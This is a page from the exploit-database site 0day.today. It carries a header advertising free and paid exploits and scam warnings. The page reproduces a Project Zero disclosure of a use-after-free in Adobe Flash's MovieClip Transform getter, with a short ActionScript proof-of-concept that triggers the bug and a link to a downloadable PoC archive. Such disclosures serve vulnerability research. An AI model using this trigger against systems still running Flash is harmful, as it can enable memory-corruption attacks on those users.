0day.today - 世界最大的漏洞利用数据库。
![](/img/logo_green.jpg)
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币金币
本站管理员使用官方账号。请谨防诈骗!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Adobe Flash - MovieClip Transform Getter Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=844 There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows: var mc = this.createEmptyMovieClip( "mc", 1); var tf = flash.geom.Transform; var g = flash.geom; g.addProperty("Transform", func, func); mc.f = ASnative(900, 419); mc.f(); function func(){ mc.removeMovieClip(); // Fix heap } Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40311.zip # 0day.today [2024-07-02] #